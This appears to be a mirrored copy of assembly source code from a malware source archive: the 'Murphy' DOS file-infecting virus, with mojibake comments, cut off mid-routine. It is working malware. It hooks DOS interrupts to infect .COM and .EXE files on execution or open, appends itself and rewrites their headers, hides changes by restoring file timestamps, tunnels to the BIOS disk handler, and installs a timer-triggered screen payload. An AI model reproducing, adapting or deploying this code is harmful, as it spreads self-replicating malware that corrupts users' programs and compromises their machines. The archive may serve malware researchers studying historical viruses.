mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
820 lines
19 KiB
NASM
820 lines
19 KiB
NASM
;
|
||
; dynamic self loader
|
||
;
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
;
|
||
; SYSTEM INFECTOR
|
||
;
|
||
;
|
||
; Version 4.00 - Copywrite (c) 1989 by L.Mateew & Jany Brankow
|
||
;
|
||
; All rights reserved.
|
||
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
|
||
|
||
page ,132
|
||
|
||
title SYSTEM INFECTOR
|
||
|
||
comp13 = offset kt1 - offset org13
|
||
comp21 = offset kt1 - offset new21
|
||
compbuff = offset kt1 - offset buffer
|
||
compbuff1 = offset kt1 - offset buffer1
|
||
comp_code = offset kt1 - offset my_code
|
||
vir_length = offset endpr - offset entry_point
|
||
Cred = offset virus - offset credits
|
||
|
||
|
||
code segment ; © - ¢ ¦¨¿ ±¥£¬¥² !!!
|
||
|
||
assume cs:code ; ¨¨¶¨ «¨§¨° ¥ CS
|
||
|
||
org 100h ; · «¥ ¤°¥± ¯°®£° ¬ ²
|
||
|
||
entry_point: ; ¢µ®¤ ²®·ª
|
||
jmp point1 ; ±ª®ª ¢ ¯°®£° ¬ ² § ³±² ®¢¿¢ ¥ ¢¨°³±
|
||
|
||
buffer db 18h dup (0c3h) ; ·¥²¨°¨ ¯® RET
|
||
buffer1 db 4 dup (0c3h) ; ²°¨ ¯® RET
|
||
my_code dw ?
|
||
time dw ?
|
||
date dw ?
|
||
old_len dd ?
|
||
new21 dd ? ; ¬¿±²® § ®¢¨¿ ¢¥ª²®°
|
||
old24 dd ?
|
||
org13 dd ?
|
||
old13 dd ?
|
||
|
||
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
;
|
||
; ‡ ¥§ ª®® ª®¯¨° ¥ ¹¥ ®²¨¤¥²¥ ¢ § ²¢®° !
|
||
;
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
credits:
|
||
db ' It''s me - Murphy. '
|
||
db ' Copywrite (c)1990 by Lubo &'
|
||
db ' Ian, Sofia, USM Laboratory. '
|
||
|
||
virus proc near ;
|
||
call time_kill ; ¯°®¢¥°ª § ¤ ² ¨ · ±
|
||
cmp ax,4b00h+'M' ; „Ž‘ ´³ª¶¨¿ EXEC ?
|
||
jnz @05
|
||
push bp
|
||
mov bp,sp
|
||
and word ptr [bp+6],0fffeh
|
||
pop bp
|
||
iret
|
||
@05:
|
||
cmp ah,4bh ; „Ž‘ ´³ª¶¨¿ EXEC ?
|
||
jz p0
|
||
cmp ax,3d00h ; „Ž‘ ´³ª¶¨¿ OPEN ?
|
||
jz p0 ; ¤ !
|
||
cmp ax,6c00h ; ¯°®¢¥°ª § DOS Fn 6C
|
||
jnz @04 ; ¨¬ ¨ ¤°³£ ·¨
|
||
cmp bl,0 ; ®°¬ «® ®²¢ °¿¥
|
||
jz p0 ; § ° §¿¢ ¥
|
||
@04:
|
||
jmp do_not_bite ; ¥ - ¯°¥µ®¤ ªº¬ ±² °¨¿ ¢¥ª²®°
|
||
p0: ;
|
||
push es ; § ¯ §¢ ¥ ES ,
|
||
push ds ; DS ,
|
||
push di ; DI ,
|
||
push si ; SI ,
|
||
push bp ; BP ,
|
||
push dx ; DX ,
|
||
push cx ; CX ,
|
||
push bx ; BX ,
|
||
push ax ; ¨ AX
|
||
call ints_on
|
||
call ints_off
|
||
cmp ax,6c00h ; ¯°®¢¥°ª § OPEN
|
||
jnz kt6 ; ¯°¥±ª · ¥
|
||
mov dx,si ; ¡¥§ ¤³¬¨
|
||
kt6:
|
||
mov cx,80h ; ¬ ª±¨¬ « ¤º«¦¨ ´ ©«®¢ ²
|
||
mov si,dx ; ±¯¥¶¨´¨ª ¶¨¿
|
||
while_null: ;
|
||
inc si ; ¯®«³· ¢ ¥
|
||
mov al,byte ptr ds:[si] ; ´ ©«®¢ ²
|
||
or al,al ; ±¯¥¶¨´¨ª ¶¨¿
|
||
loopne while_null ; ª° © ASCIIZ ?
|
||
sub si,02h ; 2 ±¨¬¢®« § ¤
|
||
cmp word ptr ds:[si],'MO' ; ¯°®¢¥°ª § .COM - ´ ©«
|
||
jz @03
|
||
cmp word ptr ds:[si],'EX'
|
||
jz @06
|
||
go_away:
|
||
jmp @01 ; ¦ «ª® -> no_ill_it
|
||
@06:
|
||
cmp word ptr ds:[si-2],'E.' ;
|
||
jz go_forward ;
|
||
jmp short go_away
|
||
@03:
|
||
cmp word ptr ds:[si-2],'C.' ; ®¹¥ ¨¹® ¥ ¥ § £³¡¥®...
|
||
jnz go_away ; .COM ´ ©«
|
||
go_forward: ;
|
||
mov ax,3d02h ; „Ž‘ ´³ª¶¨¿ 3d /®²¢ °¿¥ ´ ©«/ - °¥¦¨¬ ¤®±²º¯ 010b - ·¥²¥¥ ¨ § ¯¨±
|
||
call int_21 ; ¢°º¹ ´ ©«®¢¨¿ ¬ ¨¯³« ²®° ¢ AX ª® CF = 0
|
||
jc @01 ;
|
||
mov bx,ax ; § ¯ §¢ ¥ ´ ©«®¢¨¿ ¬ ¨¯³« ²®° ¢ BX
|
||
mov ax,5700h ;
|
||
call int_21 ;
|
||
mov cs:[time],cx ;
|
||
mov cs:[date],dx ;
|
||
mov ax,4200h ; „Ž‘ ´³ª¶¨¿ 42
|
||
xor cx,cx ; ³«¨° ¥ CX
|
||
xor dx,dx ; ³±² ®¢¿¢ ¥ ³ª § ²¥«¿ ¢ · «®²® ´ ©«
|
||
call int_21 ; INT 21
|
||
push cs ; ³±² ®¢¿¢ ¥
|
||
pop ds ; DS := CS
|
||
mov dx,offset buffer ; ¨§·¨±«¿¢ ¥ ¤°¥± buffer
|
||
mov si,dx
|
||
mov cx,0018h ; ¸¥±² ¡ ©²
|
||
mov ah,3fh ; „Ž‘ ´³ª¶¨¿ 3FH /·¥²¥¥ ®² ´ ©«/
|
||
call int_21 ; ¯°®·¨² ¥ ¯º°¢¨²¥ 8 ¡ ©² ¢ buffer
|
||
jc close_file
|
||
cmp word ptr ds:[si],'ZM'
|
||
jnz @07
|
||
call exe_file
|
||
jmp short close_file
|
||
@07:
|
||
call com_file
|
||
close_file:
|
||
jc skip_restore_date
|
||
mov ax,5701h
|
||
mov cx,cs:[time]
|
||
mov dx,cs:[date]
|
||
call int_21
|
||
skip_restore_date:
|
||
mov ah,3eh ; „Ž‘ ´³ª¶¨¿ 3E - § ²¢ °¿¥ ´ ©«
|
||
call int_21 ; INT 21
|
||
@01:
|
||
call ints_off
|
||
pop ax ; ¢º§±² ®¢¿¢ ¥ AX ,
|
||
pop bx ; BX ,
|
||
pop cx ; CX ,
|
||
pop dx ; DX ,
|
||
pop bp ; BP ,
|
||
pop si ; SI ,
|
||
pop di ; DI ,
|
||
pop ds ; DS ,
|
||
pop es ; ES
|
||
do_not_bite:
|
||
jmp dword ptr cs:[new21] ; ¯°¥µ®¤ ªº¬ ±² °¨¿ ¢¥ª²®°
|
||
virus endp
|
||
|
||
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
;
|
||
; Subroutine for .EXE file
|
||
;
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
|
||
exe_file proc near
|
||
mov cx,word ptr ds:[si+16h] ; § °¥¦¤ ¥ ®²¬¥±²¢ ¥²® CS ¡ ¯ ° £° ´¨
|
||
add cx,word ptr ds:[si+08h] ; ±º¡¨° ¥ ¯°¥´¨ª± (¢ ¯ ° £° ´¨) ± ¥£®
|
||
mov ax,10h
|
||
mul cx ; ³¬®¦ ¢ ¬¥ £¨ ± 10h ¨ ¯®«³· ¢ ¬¥
|
||
add ax,word ptr ds:[si+14h] ; ¡±®«¾²®²® ®²¬¥±²¢ ¥
|
||
adc dx,0 ; ¢µ®¤ ² ²®·ª ª ²® ±º¡¨° ¬¥ ¨ IP
|
||
push dx ; § ¯ §¢ ¬¥ £¨ ¢ ±²¥ª § ¯®- ² ²ºª
|
||
push ax
|
||
mov ax,4202h ; µ¢ ²ª § ¯®«³· ¢ ¥
|
||
xor cx,cx
|
||
xor dx,dx ; ¤º«¦¨ ²
|
||
call int_21 ; ´ ©« ¢ DX:AX
|
||
cmp dx,0
|
||
jnz go_out ; ¯°®¢¥°ª § ¤º«¦¨ ²
|
||
cmp ax,vir_length ; ´ ©« µ °¥± ®² ¢¨°³±
|
||
jnb go_out ; ª® ¥ ¢¥·¥ µ °¥± ®² ¥£® -
|
||
pop ax ; Go out !
|
||
pop dx
|
||
stc
|
||
ret
|
||
go_out:
|
||
mov di,ax ; § ¯ §¢ ¥ AX ¢ DI
|
||
mov bp,dx ; ¨ DX ¢ BP
|
||
pop cx ; ¨§¢ ¦¤ ¬¥ ®²¬¥±²¢ ¥²®
|
||
sub ax,cx ; ¢µ®¤ ² ²®·ª ®² ¤º«¦¨ ² ´ ©«
|
||
pop cx ; ¨ ¯®«³· ¢ ¬¥ ¤º«¦¨ ²
|
||
sbb dx,cx ; ¯°®£° ¬ ² ±«¥¤ ¢µ®¤ ² ²®·ª
|
||
cmp word ptr ds:[si+0ch],00h; ¯°®¢¥°ª § ®¯¶¨¿
|
||
je exitp ; /HIGH
|
||
cmp dx,0 ; ±° ¢¿¢ ¬¥ £¨ ± ¤º«¦¨ ² ¢¨°³±
|
||
jne ill_it ; ¨ ª® ± ° ¢¨ «¥¯¢ ¬¥ £® ² ¬ ¨
|
||
cmp ax,vir_length ; ².. . . .
|
||
jne ill_it
|
||
stc
|
||
ret
|
||
ill_it:
|
||
mov dx,bp ; ¯°®·¨² ¬¥ ¤º«¦¨ ²
|
||
mov ax,di ; ¯°®£° ¬ ²
|
||
push dx ; push ¢ ¬¥ £¨
|
||
push ax ; § ¯®- ² ²ºª
|
||
add ax,vir_length ; ±º¡¨° ¬¥ ¿ ±
|
||
adc dx,0 ; ¤º«¦¨ ² Murphy
|
||
mov cx,512 ; ¤¥«¨¬ ¿ 512 ¡ ©²
|
||
div cx
|
||
les di,dword ptr ds:[si+02h]; § °¥¦¤ ¥ ±² ° ² ¤º«¦¨
|
||
mov word ptr cs:[old_len],di; § ¯ §¢ ¥ ¢ ²¿«®²®
|
||
mov word ptr cs:[old_len+2],es;§ ¯ §¢ ¥ ¢ ²¿«®²®
|
||
mov word ptr ds:[si+02h],dx ; ¨ ¿ § ¯¨±¢ ¬¥
|
||
cmp dx,0
|
||
jz skip_increment
|
||
inc ax
|
||
skip_increment:
|
||
mov word ptr ds:[si+04h],ax ; ¢ ¡³´¥°
|
||
pop ax ; ·¥²¥¬ ¤º«¦¨ ² ´ ©«
|
||
pop dx ; ®² ±²¥ª
|
||
call div10h ; ¤¥«¨¬ ¿ 10h ¨ ¿ ¯®«³· ¢ ¬¥ ¢ AX:DX
|
||
sub ax,word ptr ds:[si+08h] ; ¨§¢ ¦¤ ¬¥ ¯°¥´¨ª±
|
||
les di,dword ptr ds:[si+14h]; ¯°®·¨² ¥ ±² °¨²¥
|
||
mov word ptr ds:[buffer1],di; CS:IP ¨ § ¯¨±
|
||
mov word ptr ds:[buffer1+02h],es ; ¢ ²¿«®²®
|
||
mov word ptr ds:[si+14h],dx ; § ¯¨± ®¢¨¿ IP ¢ ¡³´¥°
|
||
mov word ptr ds:[si+16h],ax ; § ¯¨± ®¢¨¿ CS ¢ ¡³´¥°
|
||
mov word ptr ds:[my_code],ax; § ¯¨± ®¢¨¿ CS ¢º¢ ²¿«®²®
|
||
mov ax,4202h
|
||
xor cx,cx
|
||
xor dx,dx
|
||
call int_21
|
||
call paste
|
||
jc exitp
|
||
mov ax,4200h
|
||
xor cx,cx
|
||
xor dx,dx
|
||
call int_21
|
||
mov ah,40h
|
||
mov dx,si
|
||
mov cx,18h
|
||
call int_21
|
||
exitp:
|
||
ret
|
||
|
||
exe_file endp
|
||
|
||
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
;
|
||
; Subroutine for dividing
|
||
;
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
div10h proc near
|
||
mov cx,04h
|
||
mov di,ax
|
||
and di,000fh
|
||
dividing:
|
||
shr dx,1
|
||
rcr ax,1
|
||
loop dividing
|
||
mov dx,di
|
||
ret
|
||
div10h endp
|
||
|
||
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
;
|
||
; Subroutine for virus moving
|
||
;
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
|
||
paste proc near
|
||
mov ah,40h ; „Ž‘ ´³ª¶¨¿ 40h /§ ¯¨± ¢º¢ ´ ©« ¨«¨ ³±²°®©±²¢®/
|
||
mov cx,vir_length ; ¨§·¨±«¿¢ ¥ ¤º«¦¨ ² ¢¨°³±
|
||
mov dx,offset entry_point ; DS:DX ²°¿¡¢ ¤ ±®· ² ¤°¥± § ¯¨±
|
||
call ints_on ; § ®¡¨ª «¿¥ · ±®¢¨ª (R/W)
|
||
jmp int_21 ; § ¯¨± ¢º¢ ´ ©«
|
||
paste endp
|
||
|
||
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
;
|
||
; Subroutine for .COM file
|
||
;
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
|
||
com_file proc near
|
||
|
||
mov ax,4202h ; „Ž‘ ´³ª¶¨¿ 42 /¯°¥¬¥±²¢ ¥ ²¥ª³¹¨¿ ³ª § ²¥« ¢º¢ ´ ¨« /AL=2 - ¢ ª° ¿/
|
||
xor cx,cx ; ³±² ®¢¿¢ ¥ °¥£¨±²°¨²¥
|
||
xor dx,dx ; CX ¨ DX / ª® CX:DX = 0 , ¢ DX:AX ±¥ ¯®«³· ¢ ¤º«¦¨ ² ´ ©« /
|
||
call int_21 ; ³±² ®¢¿¢ ¥ ¢ ª° ¿ ´ ©«
|
||
cmp ax,vir_length ; ±° ¢¿¢ ¥ ¤º«¦¨ ² ¢¨°³±
|
||
jb short no_ill_it ; ± ¯°®£° ¬ ² ¨ ¯°¥µ®¤ ¢ ª° ¿ ª®
|
||
cmp ax,64000 ; ¤º«¦¨ ² ¯°®£° ¬ ² ¥ < ¤º«¦.
|
||
jnb short no_ill_it ; ¢¨°³± ¨«¨ > 0ffff-¤º«¦. ¢¨°³± - 20h
|
||
push ax ; ±ºµ° ¿¢ ¥ AX
|
||
cmp byte ptr ds:[si],0E9h ; ¯°®¢¥°ª § JMP ¢ · «®²® ¯°®£° ¬ ²
|
||
jnz illing ; <20>¥? - Œ¥°±¨! ’®£ ¢ § ° §¿¢ ¬¥.
|
||
sub ax,vir_length + 3 ; ¯®«³· ¢ ¥ ¤º«¦¨ ² ¯°®£° ¬ ² ¡¥§ ¢¨°³± /¥¢¥²³ «®/
|
||
cmp ax,ds:[si+1] ; ¯°®¢¥°ª § ¯°®£° ¬ ² § «¥¯¥ ¢ ª° ¿
|
||
jnz illing ; <20>¥? ...
|
||
pop ax ; ®±¢®¡®¦¤ ¢ ¥ ±²¥ª
|
||
stc
|
||
ret
|
||
illing:
|
||
call paste
|
||
jnc skip_paste
|
||
pop ax
|
||
ret
|
||
skip_paste:
|
||
mov ax,4200h ; „Ž‘ ´³ª¶¨¿ 42
|
||
xor cx,cx ; ³«¨° ¥ CX
|
||
xor dx,dx ; ³±² ®¢¿¢ ¥ ³ª § ²¥«¿ ¢ · «®²® ´ ©«
|
||
call int_21 ; ¨§¯º«¥¨¥ ´³ª¶¨¿²
|
||
pop ax ; ·¥²¥¥ AX
|
||
sub ax,03h ; ¨§·¨±«¿¢ ¥ ®¯¥° ¤ JMP-
|
||
mov dx,offset buffer1 ; § ¤ ¢ ¥ ¤°¥± § ¯¨± ¢ DS:DX
|
||
mov si,dx
|
||
mov byte ptr cs:[si],0e9h ; § ¯¨± 09H (JMP) ¢ · «®²® ´ ©«
|
||
mov word ptr cs:[si+1],ax ; ®¯¥° ¤ JMP- ¢ ¯®«¥²® § § ¯¨±
|
||
mov ah,40h ; „Ž‘ ´³ª¶¨¿ 40h /§ ¯¨± ¢º¢ ´ ©« ¨«¨ ³±²°®©±²¢®/
|
||
mov cx,3 ; § ¯¨± ± ¬® 3 ¡ ©²
|
||
call int_21 ; ¨§¯º«¥¨¥ ´³ª¶¨¿²
|
||
no_ill_it:
|
||
ret
|
||
|
||
com_file endp
|
||
|
||
|
||
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
;
|
||
; Subroutine for calling of an 'int 21h'
|
||
;
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
|
||
int_21 proc near
|
||
pushf
|
||
call dword ptr [new21]
|
||
ret
|
||
int_21 endp
|
||
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
;
|
||
; This subroutine changes the int 24h vector to me
|
||
;
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
ints_on proc near
|
||
push ax
|
||
push ds
|
||
push es
|
||
xor ax,ax
|
||
push ax
|
||
pop ds
|
||
cli
|
||
les ax,dword ptr ds:[24h*4]
|
||
mov word ptr cs:[old24],ax
|
||
mov word ptr cs:[old24+2],es
|
||
mov ax,offset int_24
|
||
mov word ptr ds:[24h*4],ax
|
||
mov word ptr ds:[24h*4+2],cs
|
||
les ax,dword ptr ds:[13h*4]
|
||
mov word ptr cs:[old13],ax
|
||
mov word ptr cs:[old13+2],es
|
||
les ax,dword ptr cs:[org13]
|
||
mov word ptr ds:[13h*4],ax
|
||
mov word ptr ds:[13h*4+2],es
|
||
sti
|
||
pop es
|
||
pop ds
|
||
pop ax
|
||
ret
|
||
ints_on endp
|
||
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
;
|
||
; This subroutine restores the int 24h vector
|
||
;
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
ints_off proc near
|
||
push ax
|
||
push ds
|
||
push es
|
||
xor ax,ax
|
||
push ax
|
||
pop ds
|
||
cli
|
||
les ax,dword ptr cs:[old24]
|
||
mov word ptr ds:[24h*4],ax
|
||
mov word ptr ds:[24h*4+2],es
|
||
les ax,dword ptr cs:[old13]
|
||
mov word ptr ds:[13h*4],ax
|
||
mov word ptr ds:[13h*4+2],es
|
||
sti
|
||
pop es
|
||
pop ds
|
||
pop ax
|
||
ret
|
||
ints_off endp
|
||
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
;
|
||
; This subroutine works the int 24h
|
||
;
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
int_24 proc far
|
||
mov al,3
|
||
iret
|
||
int_24 endp
|
||
|
||
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
;
|
||
; Œ ©² ¯ ± ¡¥§§ ¹¨²¨²¥ µ®°¨¶
|
||
;
|
||
;
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
|
||
joke proc far
|
||
push ax ; § ¯ §¢ ¥
|
||
push bx
|
||
push cx ;
|
||
push dx
|
||
push si
|
||
push di
|
||
push bp
|
||
push ds ; °¥£¨±²°¨²¥
|
||
push es
|
||
xor ax,ax
|
||
push ax
|
||
pop ds
|
||
mov bh,ds:[462h]
|
||
mov ax,ds:[450h]
|
||
mov cs:[old_pos],ax
|
||
mov ax,cs:[pos_value]
|
||
mov word ptr ds:[450h],ax
|
||
mov ax,word ptr cs:[spot_buff]
|
||
mov bl,ah
|
||
mov ah,09h
|
||
mov cx,1
|
||
int 10h
|
||
call change_pos
|
||
call push_spot
|
||
mov ax,cs:pos_value
|
||
mov word ptr ds:[450h],ax
|
||
mov bl,07h
|
||
mov ax,0907h
|
||
mov cx,1
|
||
int 10h
|
||
mov ax,cs:[old_pos]
|
||
mov ds:[450h],ax
|
||
pop es
|
||
pop ds
|
||
pop bp
|
||
pop di
|
||
pop si
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
jmp dword ptr cs:[old_1ch]
|
||
|
||
|
||
spot_buff dw ?
|
||
pos_value dw 1010h
|
||
direction db 0
|
||
old_1ch dd ?
|
||
old_pos dw ?
|
||
|
||
change_pos proc near
|
||
mov ax,cs:[pos_value]
|
||
mov bx,word ptr ds:[44ah]
|
||
dec bx
|
||
test cs:[direction],00000001b
|
||
jz @001
|
||
cmp al,bl
|
||
jb @002
|
||
xor cs:[direction],00000001b
|
||
jmp short @002
|
||
@001:
|
||
cmp al,0
|
||
jg @002
|
||
xor cs:[direction],00000001b
|
||
@002:
|
||
test cs:[direction],00000010b
|
||
jz @003
|
||
cmp ah,24
|
||
jb @005
|
||
xor cs:[direction],00000010b
|
||
jmp short @005
|
||
@003:
|
||
cmp ah,0
|
||
jg @005
|
||
xor cs:[direction],00000010b
|
||
@005:
|
||
cmp byte ptr cs:spot_buff,20h
|
||
je skip_let
|
||
cmp byte ptr cs:[pos_value+1],0
|
||
je skip_let
|
||
xor cs:[direction],00000010b
|
||
skip_let:
|
||
test cs:[direction],00000001b
|
||
jz @006
|
||
inc byte ptr cs:[pos_value]
|
||
jmp short @007
|
||
@006:
|
||
dec byte ptr cs:[pos_value]
|
||
@007:
|
||
test cs:[direction],00000010b
|
||
jz @008
|
||
inc byte ptr cs:[pos_value+1]
|
||
jmp short @009
|
||
@008:
|
||
dec byte ptr cs:[pos_value+1]
|
||
@009:
|
||
ret
|
||
change_pos endp
|
||
|
||
push_spot proc near
|
||
mov ax,cs:[pos_value]
|
||
mov word ptr ds:[450h],ax
|
||
mov bh,ds:[462h]
|
||
mov ah,08h
|
||
int 10h
|
||
mov word ptr cs:[spot_buff],ax
|
||
ret
|
||
push_spot endp
|
||
joke endp
|
||
|
||
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
;
|
||
; Subroutine for check current time
|
||
;
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
|
||
time_kill proc near ;
|
||
push ax ; § ¯ §¢ ¥
|
||
push bx
|
||
push cx ;
|
||
push dx
|
||
push si
|
||
push di
|
||
push bp
|
||
push ds ; °¥£¨±²°¨²¥
|
||
push es
|
||
xor ax,ax ; ¯®«³· ¢ ¥
|
||
push ax
|
||
pop ds
|
||
cmp word ptr ds:[1Ch*4],offset joke
|
||
je next_way
|
||
mov ax,ds:[46ch]
|
||
mov dx,ds:[46ch+2]
|
||
mov cx,0ffffh
|
||
div cx
|
||
cmp ax,10
|
||
jne next_way
|
||
cli
|
||
mov bp,word ptr ds:[450h]
|
||
call push_spot
|
||
mov ds:[450h],bp
|
||
les ax,ds:[1ch*4]
|
||
mov word ptr cs:[old_1ch],ax
|
||
mov word ptr cs:[old_1ch+2],es
|
||
mov word ptr ds:[1Ch*4],offset joke
|
||
mov word ptr ds:[1Ch*4+2],cs
|
||
sti
|
||
next_way:
|
||
pop es
|
||
pop ds
|
||
pop bp
|
||
pop di
|
||
pop si
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
ret
|
||
time_kill endp
|
||
|
||
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
;
|
||
; Subroutine for multiplication
|
||
;
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
|
||
sub_10 proc near
|
||
mov dx,10h
|
||
mul dx ; dx:ax = reg * ax
|
||
ret
|
||
sub_10 endp
|
||
|
||
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
;
|
||
; ? ? ? ? ? ? ? ?
|
||
;
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
zero_regs proc near
|
||
|
||
xor ax,ax
|
||
xor bx,bx
|
||
xor cx,cx
|
||
xor dx,dx
|
||
xor si,si
|
||
xor di,di
|
||
xor bp,bp
|
||
ret
|
||
|
||
zero_regs endp
|
||
|
||
|
||
point1: ;
|
||
push ds
|
||
call kt1 ; ²°¨ª §
|
||
kt1: ; ¨§·¨±«¿¢ ¥ ®²¬¥±²¢ ¥²®
|
||
mov ax,4b00h + 'M' ; kt1
|
||
int 21h
|
||
jc stay
|
||
jmp go_to_program ;
|
||
stay: ;
|
||
pop si ;
|
||
push si ;
|
||
mov di,si ;
|
||
xor ax,ax ; Zero register
|
||
push ax ;
|
||
pop ds ;
|
||
les ax,ds:[13h*4] ; (0000:004C=6E5h) Load 32 bit ptr
|
||
mov cs:[si-comp13],ax ; (64BB:06F4=9090h)
|
||
mov cs:[si-comp13+2],es ; (64BB:06F6=9090h)
|
||
les bx,ds:[21h*4]
|
||
mov word ptr cs:[di-comp21],bx ; ®²¬¥±²¢ ¥
|
||
mov word ptr cs:[di-comp21+2],es ; ±¥£¬¥²
|
||
mov ax,ds:[102h] ; (0000:0102=0F000h)
|
||
cmp ax,0F000h
|
||
jne loc_14 ; Jump if not equal
|
||
mov dl,80h
|
||
mov ax,ds:[106h] ; (0000:0106=0C800h)
|
||
cmp ax,0F000h
|
||
je loc_7 ; Jump if equal
|
||
cmp ah,0C8h
|
||
jb loc_14 ; Jump if below
|
||
cmp ah,0F4h
|
||
jae loc_14 ; Jump if above or =
|
||
test al,7Fh ; ''
|
||
jnz loc_14 ; Jump if not zero
|
||
mov ds,ax
|
||
cmp word ptr ds:[0],0AA55h ; (C800:0000=0AA55h)
|
||
jne loc_14 ; Jump if not equal
|
||
mov dl,ds:[02h] ; (C800:0002=10h)
|
||
loc_7:
|
||
mov ds,ax
|
||
xor dh,dh ; Zero register
|
||
mov cl,9
|
||
shl dx,cl ; Shift w/zeros fill
|
||
mov cx,dx
|
||
xor si,si ; Zero register
|
||
|
||
locloop_8:
|
||
lodsw ; String [si] to ax
|
||
cmp ax,0FA80h
|
||
jne loc_9 ; Jump if not equal
|
||
lodsw ; String [si] to ax
|
||
cmp ax,7380h
|
||
je loc_10 ; Jump if equal
|
||
jnz loc_11 ; Jump if not zero
|
||
loc_9:
|
||
cmp ax,0C2F6h
|
||
jne loc_12 ; Jump if not equal
|
||
lodsw ; String [si] to ax
|
||
cmp ax,7580h
|
||
jne loc_11 ; Jump if not equal
|
||
loc_10:
|
||
inc si
|
||
lodsw ; String [si] to ax
|
||
cmp ax,40CDh
|
||
je loc_13 ; Jump if equal
|
||
sub si,3
|
||
loc_11:
|
||
dec si
|
||
dec si
|
||
loc_12:
|
||
dec si
|
||
loop locloop_8 ; Loop if cx > 0
|
||
jmp short loc_14
|
||
loc_13:
|
||
sub si,7
|
||
mov cs:[di-comp13],si ; (64BB:06F4=9090h)
|
||
mov cs:[di-comp13+2],ds ; (64BB:06F6=9090h)
|
||
loc_14:
|
||
mov ah,62h
|
||
int 21h
|
||
mov es,bx
|
||
mov ah,49h ; 'I'
|
||
int 21h ; DOS Services ah=function 49h,
|
||
; release memory block, es=seg
|
||
mov bx,0FFFFh
|
||
mov ah,48h ; 'H'
|
||
int 21h ; DOS Services ah=function 48h,
|
||
; allocate memory, bx=bytes/16
|
||
sub bx,vir_length/10h+2
|
||
jc go_to_program ; Jump if carry Set
|
||
mov cx,es
|
||
stc ; Set carry flag
|
||
adc cx,bx
|
||
mov ah,4Ah ; 'J'
|
||
int 21h ; DOS Services ah=function 4Ah,
|
||
; change mem allocation, bx=siz
|
||
mov bx,vir_length/10h+1
|
||
stc ; Set carry flag
|
||
sbb es:[02h],bx ; (FF95:0002=0B8CFh)
|
||
push es
|
||
mov es,cx
|
||
mov ah,4Ah ; 'J'
|
||
